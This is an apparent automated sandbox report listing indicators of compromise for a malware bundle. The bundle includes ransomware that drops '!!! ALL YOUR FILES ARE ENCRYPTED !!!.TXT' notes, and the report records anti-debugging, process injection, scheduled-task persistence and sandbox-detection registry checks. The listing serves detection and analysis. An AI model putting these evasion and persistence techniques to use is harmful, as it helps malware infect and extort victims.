EVawsdwdyWR8sahgToN8uJ5E.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA md8_8eus.exe -
Enumerates connected drives 3 TTPs 64 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\U: msiexec.exe File opened (read-only) \??\W: GameBoxWin64.exe File opened (read-only) \??\K: spoolsv.exe File opened (read-only) \??\Z: Setup.exe File opened (read-only) \??\T: GameBoxWin64.exe File opened (read-only) \??\L: Cleaner Installation.exe File opened (read-only) \??\F: Setup.exe File opened (read-only) \??\W: msiexec.exe File opened (read-only) \??\M: spoolsv.exe File opened (read-only) \??\O: Cleaner Installation.exe File opened (read-only) \??\G: Setup.exe File opened (read-only) \??\K: Setup.exe File opened (read-only) \??\H: msiexec.exe File opened (read-only) \??\B: GameBoxWin64.exe File opened (read-only) \??\M: GameBoxWin64.exe File opened (read-only) \??\Z: GameBoxWin64.exe File opened (read-only) \??\E: spoolsv.exe File opened (read-only) \??\T: Cleaner Installation.exe File opened (read-only) \??\V: Cleaner Installation.exe File opened (read-only) \??\Y: Cleaner Installation.exe File opened (read-only) \??\F: GameBoxWin64.exe File opened (read-only) \??\P: GameBoxWin64.exe File opened (read-only) \??\E: GameBoxWin64.exe File opened (read-only) \??\A: Setup.exe File opened (read-only) \??\V: Setup.exe File opened (read-only) \??\R: GameBoxWin64.exe File opened (read-only) \??\Z: spoolsv.exe File opened (read-only) \??\V: GameBoxWin64.exe File opened (read-only) \??\Y: GameBoxWin64.exe File opened (read-only) \??\S: Cleaner Installation.exe File opened (read-only) \??\W: Setup.exe File opened (read-only) \??\Q: GameBoxWin64.exe File opened (read-only) \??\Y: spoolsv.exe File opened (read-only) \??\X: GameBoxWin64.exe File opened (read-only) \??\B: spoolsv.exe File opened (read-only) \??\A: spoolsv.exe File opened (read-only) \??\J: Cleaner Installation.exe File opened (read-only) \??\K: Cleaner Installation.exe File opened (read-only) \??\R: Setup.exe File opened (read-only) \??\L: msiexec.exe File opened (read-only) \??\K: GameBoxWin64.exe File opened (read-only) \??\Q: Cleaner Installation.exe File opened (read-only) \??\X: Setup.exe File opened (read-only) \??\R: msiexec.exe File opened (read-only) \??\I: GameBoxWin64.exe File opened (read-only) \??\V: msiexec.exe File opened (read-only) \??\L: GameBoxWin64.exe File opened (read-only) \??\X: spoolsv.exe File opened (read-only) \??\J: Setup.exe File opened (read-only) \??\I: msiexec.exe File opened (read-only) \??\S: Setup.exe File opened (read-only) \??\G: msiexec.exe File opened (read-only) \??\Y: msiexec.exe File opened (read-only) \??\U: GameBoxWin64.exe File opened (read-only) \??\E: Cleaner Installation.exe File opened (read-only) \??\L: Setup.exe File opened (read-only) \??\A: msiexec.exe File opened (read-only) \??\J: msiexec.exe File opened (read-only) \??\G: GameBoxWin64.exe File opened (read-only) \??\S: GameBoxWin64.exe File opened (read-only) \??\V: spoolsv.exe File opened (read-only) \??\B: Setup.exe File opened (read-only) \??\P: Setup.exe File opened (read-only) \??\I: Cleaner Installation.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 24 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 36 api.db-ip.com 223 freegeoip.app 246 ipinfo.io 597 freegeoip.app 242 ipinfo.io 273 ipinfo.io 416 ipinfo.io 435 ip-api.com 31 ipinfo.io 32 ipinfo.io 35 api.db-ip.com 216 freegeoip.app 220 freegeoip.app 222 ipinfo.io 372 ipinfo.io 560 geoiptool.com 141 ipinfo.io 146 ipinfo.io 164 ip-api.com 219 freegeoip.app 228 ipinfo.io 233 ipinfo.io 406 ipinfo.io 596 freegeoip.app -
Drops file in System32 directory 25 IoCs
description ioc Process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat svchost.exe File opened for modification C:\Windows\System32\Tasks\ogbsoj svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent E7D2EA8B3FD799C9 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8085.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8086.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\oemvista.inf DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8086.tmp DrvInst.exe File created C:\Windows\System32\DriverStore\drvstore.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29} DrvInst.exe File opened for modification C:\Windows\System32\Tasks\VideoDriver svchost.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\Tasks\Firefox Default Browser Agent F4C64842E5668806 svchost.exe File created C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8075.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\CatRoot2\dberr.txt DrvInst.exe File opened for modification C:\Windows\System32\Tasks\WindowsSecurity svchost.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF DrvInst.exe File opened for modification C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\644B8874112055B5E195ECB0E8F243A4 svchost.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8075.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\SET8085.tmp DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\Temp\{2afbda83-767c-584d-8b38-5b6ea6acdc29}\tap0901.cat DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\tap0901.sys DrvInst.exe File opened for modification C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.inf DrvInst.exe File created C:\Windows\System32\DriverStore\FileRepository\oemvista.inf_amd64_a572b7f20c402d28\oemvista.PNF tapinstall.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs
pid Process 3420 sJmbQWB0NpkfM_pWcJqhL9vW.exe 3260 llVVu0HlsK1Kw5wuGRgoKpD7.exe 1328 Jio2aWKJp8cWMZdrGeQ8KEbN.exe 908 EVawsdwdyWR8sahgToN8uJ5E.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 7148 jyGoXTSknssMRF52BzVwSycd.exe 7084 hSuVUnsWY7mz347tCpvO6Hm7.exe 6856 builder.exe 1796 LMWBld729vM0NLcjGUIXs50T.exe 5688 ZFsgv3ebJ4tVSQycSj7b1ZVv.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 6856 builder.exe 9892 F6F7.exe 6856 builder.exe 6960 1EE4.exe 6856 builder.exe 9472 Update.exe 6856 builder.exe 5640 Clip_.exe 9976 Red1_.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 8512 UpdateCore.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 9976 Red1_.exe 6856 builder.exe 5640 Clip_.exe 9976 Red1_.exe 6856 builder.exe 5640 Clip_.exe 9976 Red1_.exe 5640 Clip_.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 1256 mask_svc.exe 6856 builder.exe 9976 Red1_.exe 5640 Clip_.exe 6856 builder.exe 9976 Red1_.exe 10052 mask_svc.exe -
Suspicious use of SetThreadContext 11 IoCs
description pid Process procid_target PID 688 set thread context of 4704 688 ZilQa116kCxMyJ4DYppJKSNT.exe 113 PID 3712 set thread context of 4712 3712 7SrzRNSSzQZ1yRbsPelarolG.exe 112 PID 3832 set thread context of 1584 3832 _fo2akGzHM8e3HDnYwqptuNS.exe 127 PID 4048 set thread context of 4720 4048 J6iNDogrvenIPg_ZJWx6UAoJ.exe 130 PID 2656 set thread context of 4532 2656 svchost.exe 190 PID 6132 set thread context of 7228 6132 De_Zl6GNEMYTi1u_W7qtCpq6.exe 259 PID 7104 set thread context of 7836 7104 hokD3PTLQSSwTOQbjs46iQbu.exe 261 PID 6696 set thread context of 7928 6696 uTCoy4Q77ijSrWZi4OmLb7Ab.exe 269 PID 1232 set thread context of 7400 1232 RTa9h1GEw8MZAkMnDG_Wd_nd.exe 271 PID 5952 set thread context of 7144 5952 RUNDLL32.EXE 324 PID 8556 set thread context of 6608 8556 WindowsSecurity.exe 468 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic-Palatino Linotype.xml.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial1-ul-oob.xrm-ms.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL012.XML spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\INDUST\INDUST.ELM spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\PhotosApp\Assets\ThirdPartyNotices\ThirdPartyNotices.html spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Home\LTR\contrast-black\WideTile.scale-200.png spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\app\dev\nls\nb-no\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files\Java\jdk1.8.0_66\jre\lib\applet\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\nl-nl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-modules-templates.jar.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentR_Trial-pl.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription3-ppd.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-80.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Microsoft3DViewer_1.1702.21039.0_x64__8wekyb3d8bbwe\AppxSignature.p7x spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\zh-tw\ui-strings.js spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.emf.ecore_2.10.1.v20140901-1043\license.html spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.e4.ui.css.core.nl_zh_4.4.0.v20140623020002.jar.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-lib-uihandler.jar.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-actions.xml.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\StandardVL_MAK-ul-oob.xrm-ms.payfast290.106-7DA-F8B spoolsv.exe File created C:\Program Files\Microsoft Office\root\Office16\FPA_FA000000008\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.contrast-white_scale-100.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Contrast\contrast-white\BuilderLogo.png spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.core.ssl.feature_1.0.0.v20140827-1444\META-INF\eclipse.inf.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\Browser\WCChromeExtn\WCChromeNativeMessagingHost.exe.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\example_icons.png spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\nb-no\ui-strings.js.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\69_24x24x32.png spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.jsp.jasper.registry_1.0.300.v20130327-1442.jar.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-modules-keyring-impl.xml.payfast290.106-7DA-F8B spoolsv.exe File created C:\Program Files\Microsoft Office\root\Office16\MSIPC\el\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosAppList.targetsize-48_altform-fullcolor.png spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\TimeBackground.winmd spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\uk-ua\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files (x86)\GameBox INC\Fymabivuhi.exe.config MicrosoftEdgeCP.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Car\RTL\LargeTile.scale-200.png spoolsv.exe File created C:\Program Files\WindowsApps\Microsoft.WindowsStore_11701.1001.874.0_neutral_~_8wekyb3d8bbwe\microsoft.system.package.metadata\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\js\nls\nb-no\ui-strings.js spoolsv.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\News\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\root\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\js\nls\da-dk\ui-strings.js.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-host_zh_CN.jar spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\duplicate.svg.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\iw_get.svg.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Voices\en-US\en-US_female_TTS\prompts_en-US_TTS.lua spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Excel.Excel.x-none.msi.16.x-none.xml spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_OEM_Perp4-ppd.xrm-ms spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProXC2RVL_MAKC2R-pl.xrm-ms.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\VisioProO365R_Subscription-ul-oob.xrm-ms.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\PROOF\MSSP7EN.dub spoolsv.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\catalog.json.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\onenoteim.exe spoolsv.exe File opened for modification C:\Program Files\7-Zip\Lang\sv.txt spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\nls\ko-kr\ui-strings.js.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\export.svg spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\vo_60x42.png spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\createpdfupsell-app\js\nls\pl-pl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\js\nls\nl-nl\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\check-mark-1x.png.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\css\main.css.payfast290.106-7DA-F8B spoolsv.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\fr-fr\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-core.xml.payfast290.106-7DA-F8B spoolsv.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Getstarted_4.5.6.0_x64__8wekyb3d8bbwe\Assets\GetStartedSmallTile.scale-100_contrast-black.png spoolsv.exe -
Drops file in Windows directory 32 IoCs
description ioc Process File opened for modification C:\Windows\Installer\MSI4490.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4A5E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI4EE3.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSIE95A.tmp msiexec.exe File created C:\Windows\Installer\inprogressinstallinfo.ipi msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log tapinstall.exe File opened for modification C:\Windows\Installer\MSI9E7A.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI46F2.tmp msiexec.exe File opened for modification C:\Windows\Installer\ msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File created C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\INF\oem2.PNF DrvInst.exe File opened for modification C:\Windows\Installer\MSI2609.tmp msiexec.exe File created C:\Windows\Installer\SourceHash{B59E6947-D960-4A88-902E-F387AFD7DF1F} msiexec.exe File created C:\Windows\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT spoolsv.exe File opened for modification C:\Windows\Installer\MSI1677.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log svchost.exe File opened for modification C:\Windows\Tasks\ogbsoj.job GcleanerEU.exe File created C:\Windows\Installer\f7bb21d.msi msiexec.exe File opened for modification C:\Windows\Installer\f7bb21d.msi msiexec.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log msiexec.exe File opened for modification C:\Windows\Installer\MSI5DF9.tmp msiexec.exe File opened for modification C:\Windows\INF\setupapi.dev.log DrvInst.exe File opened for modification C:\Windows\Debug\ESE.TXT MicrosoftEdge.exe File opened for modification C:\Windows\inf\oem2.inf DrvInst.exe File created C:\Windows\Tasks\ogbsoj.job GcleanerEU.exe File opened for modification C:\Windows\Tasks\ogbsoj.job svchost.exe File opened for modification C:\Windows\Logs\DPX\setupact.log expand.exe File opened for modification C:\Windows\Logs\DPX\setuperr.log expand.exe File opened for modification C:\Windows\Installer\MSI150E.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI18AA.tmp msiexec.exe File opened for modification C:\Windows\Installer\MSI27FE.tmp msiexec.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 43 IoCs
pid pid_target Process procid_target 4996 4080 WerFault.exe 78 4488 4080 WerFault.exe 78 4652 4080 WerFault.exe 78 4876 4080 WerFault.exe 78 5040 4080 WerFault.exe 78 1852 4080 WerFault.exe 78 3144 2304 WerFault.exe 109 4768 2304 WerFault.exe 109 3400 2304 WerFault.exe 109 5244 2304 WerFault.exe 109 5556 2832 WerFault.exe 83 5736 2832 WerFault.exe 83 5892 2832 WerFault.exe 83 5980 2304 WerFault.exe 109 6036 2832 WerFault.exe 83 5580 2832 WerFault.exe 83 4932 2304 WerFault.exe 109 6028 2832 WerFault.exe 83 5400 2832 WerFault.exe 83 4460 2304 WerFault.exe 109 4208 2832 WerFault.exe 83 5644 2304 WerFault.exe 109 6476 2832 WerFault.exe 83 6752 2832 WerFault.exe 83 6932 2832 WerFault.exe 83 6448 2832 WerFault.exe 83 6928 2832 WerFault.exe 83 724 5508 WerFault.exe 245 7436 5508 WerFault.exe 245 7680 5508 WerFault.exe 245 1776 6568 WerFault.exe 205 7896 5508 WerFault.exe 245 8120 6568 WerFault.exe 205 6636 736 WerFault.exe 236 5884 6568 WerFault.exe 205 4292 6568 WerFault.exe 205 7432 4792 WerFault.exe 244 7692 4792 WerFault.exe 244 5828 4792 WerFault.exe 244 5380 4792 WerFault.exe 244 6824 6084 WerFault.exe 156 6776 6084 WerFault.exe 156 7432 6568 WerFault.exe 205 -
Checks SCSI registry key(s) 3 TTPs 64 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0034 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0052 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004D svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI RTa9h1GEw8MZAkMnDG_Wd_nd.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Service DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2002 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004C svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0065 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_&PROD_HEARTDISK\4&37CE57BA&0&000000 tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{a8b865dd-2e3d-4094-ad97-e593a70c75d6}\0018 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{88ad39db-0d0c-4a38-8435-4043826b5c91}\0009 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0064 svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\0054 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\UpperFilters DrvInst.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{3464f7a4-2444-40b1-980a-e0903cb6d912}\000A\ svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{80d81ea6-7473-4b0c-8216-efc11a2c4c8b}\0004 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\CompatibleIDs tapinstall.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{78c34fc8-104a-4aca-9ea4-524d52996e57}\004E svchost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_&Prod_HeartDisk\4&37ce57ba&0&000000\Properties\{656a3bb3-ecc0-43fd-8477-4ae0404a96cd}\2006 svchost.exe Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Sanu&Prod_Sanu_DVD-ROM\4&37ce57ba&0&010000\LowerFilters DrvInst.exe Key value queried 